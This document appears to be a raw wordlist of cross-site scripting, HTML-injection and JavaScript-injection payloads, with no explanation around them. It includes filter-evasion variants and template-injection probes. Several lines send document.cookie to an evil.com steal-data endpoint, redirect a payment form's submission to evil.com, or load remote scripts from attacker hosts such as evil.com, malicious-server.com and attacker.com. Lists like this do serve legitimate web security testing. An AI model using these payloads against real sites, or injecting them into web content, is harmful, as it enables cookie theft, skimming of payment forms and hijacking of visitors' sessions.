"><script>alert('HTML Injection by Ax01')</script>
"><img src="https://evil.com/injection.png" onerror="javascript:alert('HTML Injection')"
"><a href="javascript:alert('HTML Injection')">Click Here</a>
"><p style="display:none">HTML Injection</p>
"><div onmouseover="javascript:alert('HTML Injection by Ax01')">Hover over me</div>
"><object data="https://evil.com/injection.swf" type="application/x-shockwave-flash"></object>
"><video src="https://evil.com/injection.mp4" autoplay onended="javascript:alert('HTML Injection by Ax01')"></video>
"><iframe src="https://evil.com/injection.html"></iframe>
"><form action="https://evil.com/injection" method="post"><input type="hidden" name="injection" value="true" /></form>
"><style>body { background-image: url('https://evil.com/injection.jpg') }</style>
<svg onload=location='javascript:alert(1)'>
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
<img src=totallyfake onerror=import(‘//domain.com/‘);//
'-alert(1)-';"-alert(2)-"//"><svg/onload=alert(3)>
"';alert(1);//
";alert(1);//
"></script><script>alert(1);</script>
" onclick="alert(1);
" style="display:none" onload="alert(1);
"><img src=x onerror=alert(1);>
"><svg onload=alert(1);>
"><input type="text" autofocus onfocus=alert(1);>
"><button onclick=alert(1);>Click me</button>
"><a href="javascript:alert(1);">Click me</a>
"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
'"><svg/onload=prompt(5);>{{7*7}}
'"></title></textarea></script></style></noscript><script src=abc.xss.ht></script>
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
"><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
<img src="x">'">${{7*7}}
<script>alert('JS injection')</script>
<script src="http://evil.com/malicious.js"></script>
<script>document.location='http://evil.com/steal-data.php?cookie='+document.cookie</script>
<script>document.forms[0].submit()</script>
<script>document.getElementById('username').value='hacker';document.getElementById('password').value='123456';</script>
<script>document.getElementById('payment-form').action='http://evil.com/steal-data.php';document.getElementById('payment-form').submit();</script>
<script>document.write('<img src="http://evil.com/steal-data.php?cookie='+document.cookie+'" />')</script>
<script>history.replaceState({}, '', 'http://evil.com/steal-data.php?cookie='+document.cookie)</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 74, 83, 32, 105, 110, 106, 101, 99, 116, 105, 111, 110, 39, 41))</script>
<script>document.body.innerHTML="<h1>This site has been hacked by JS injection!</h1>";</script>
";alert('JS Injection Attack!');"
";document.write('<script>alert("JS Injection Attack!");</script>');"
";eval('alert("JS Injection Attack!")');"
";prompt('JS Injection Attack!');"
";document.body.innerHTML='<script>alert("JS Injection Attack!");</script>';"
";window.location='javascript:alert("JS Injection Attack!")';"
";document.createElement('script').src='https://malicious-server.com/injection.js';"
";document.location.href='javascript:alert("JS Injection Attack!")';"
";document.write('<script src="https://malicious-server.com/injection.js"></script>');"
";window.onload=function(){alert('JS Injection Attack!');}"
<script>alert(1);</script>
<img src="javascript:alert(1);">
<iframe src="javascript:alert(1);">
<a href="javascript:alert(1);">Click here</a>
<svg onload="javascript:alert(1);">
<body onload="javascript:alert(1);">
<input type="text" onfocus="javascript:alert(1);">
<textarea onfocus="javascript:alert(1);"></textarea>
<select onfocus="javascript:alert(1);">
<button onclick="javascript:alert(1);">Click me</button>
"<img src='x' onerror='alert(1)'>"
"<svg onload='alert(1)'>
"<<script>alert(1);//<</script>"
"<img src=x onerror=alert(1)>"
"<object data=javascript:alert(1)>
"<svg onload=alert(1)>
"javascript:alert(1)"
"javascript:prompt(1)"
"<body onload=alert(1)>"
"><script>alert(1)</script>
" onfocus="alert(1)
" onmouseover="alert(1)
<img src=x onerror="alert(1)">
"><img src=x onerror="alert(1)">
<svg onload="alert(1)">
"><svg onload="alert(1)">
"><a href="javascript:alert(1)">click here</a>
"><iframe src="javascript:alert(1)">
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><applet code="java.lang.Runtime.getRuntime().exec('alert(1)')">
"><script src="//attacker.com/xss.js">
"><form action="javascript:alert(1)">
"><input type="text" value="" autofocus onfocus="alert(1)">
"><textarea autofocus onfocus="alert(1)">
"><select autofocus onfocus="alert(1)">
"><button autofocus onfocus="alert(1)">
"><video src="javascript:alert(1)">
"><audio src="javascript:alert(1)">
"><bgsound src="javascript:alert(1)">
"><link rel="stylesheet" href="javascript:alert(1)">
"><style>*{x:expression(alert(1))}</style>
"><!--<img src="--><img src=x onerror=alert(1)>
"><script>document.write("<img src='"+document.cookie+"'>");</script>
"><script>document.write(`<img src="'+document.cookie+'">`);</script>
"><script>document.write(<img src="${document.cookie}">);</script>
"><script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
"><script>eval(atob('YWxlcnQoMSk='))</script>
"><script>eval(decodeURIComponent('%61%6c%65%72%74%28%31%29'))</script>
"><script>eval(decodeURIComponent('%61%6c%65%72%74%28%31%29%3b'))</script>
"><script>eval(decodeURIComponent('YWxlcnQoMSk%3d'))</script>
"><script>eval(decodeURIComponent('YWxlcnQoMSk%253d'))</script>
"><script>alert(1)</script>
<script>prompt(1)</script>
<script>confirm(1)</script>
"><img src=x onerror=alert(1)>
"><svg onload=alert(1)>
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><iframe src="javascript:alert(1)">
"><a href="javascript:alert(1)">Click here</a>
"><img src="javascript:alert(1)">
" onclick=alert(1)>Click me
"><img src=x onmouseover=alert(1)>
"><input type="text" value=""><script>alert(1)</script>
"><input type="text" value=""><img src=x onerror=alert(1)>
"><input type="text" value=""><svg onload=alert(1)>
"><input type="text" value=""><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><input type="text" value=""><iframe src="javascript:alert(1)">
"><input type="text" value=""><a href="javascript:alert(1)">Click here</a>
"><input type="text" value=""><img src="javascript:alert(1)">
" onfocus=alert(1) autofocus><input type="text">
"><select><option>"><script>alert(1)</script>
"><select><option><img src=x onerror=alert(1)>
"><select><option><svg onload=alert(1)>
"><select><option><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><select><option><iframe src="javascript:alert(1)">
"><select><option><a href="javascript:alert(1)">Click here</a>
"><select><option><img src="javascript:alert(1)">
"><textarea>"><script>alert(1)</script>
"><textarea><img src=x onerror=alert(1)>
"><textarea><svg onload=alert(1)>
"><textarea><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
"><textarea><iframe src="javascript:alert(1)">
"><textarea><a href="javascript:alert(1)">Click here</a>
"><textarea><img src="javascript:alert(1)">
"><body onload=alert(1)>
"><body onpageshow=alert(1)>
"style="position:fixed;top:0;left:0;border:999em solid green;" onmouseover="alert(document.domain)"
{{_c.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
toString=\u0061lert;window+' '
toString=\u0061lert;window+''
"hello<form/><!><details/open/ontoggle=alert(1)>"@gmail.com
%22%26%23x27%3B%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aprompt.valueOf%28%29%281%29%3E%3C%2FiFramE%3E
%3CsVg%2Fonload%3Dprompt%28document.cookie%29%3E


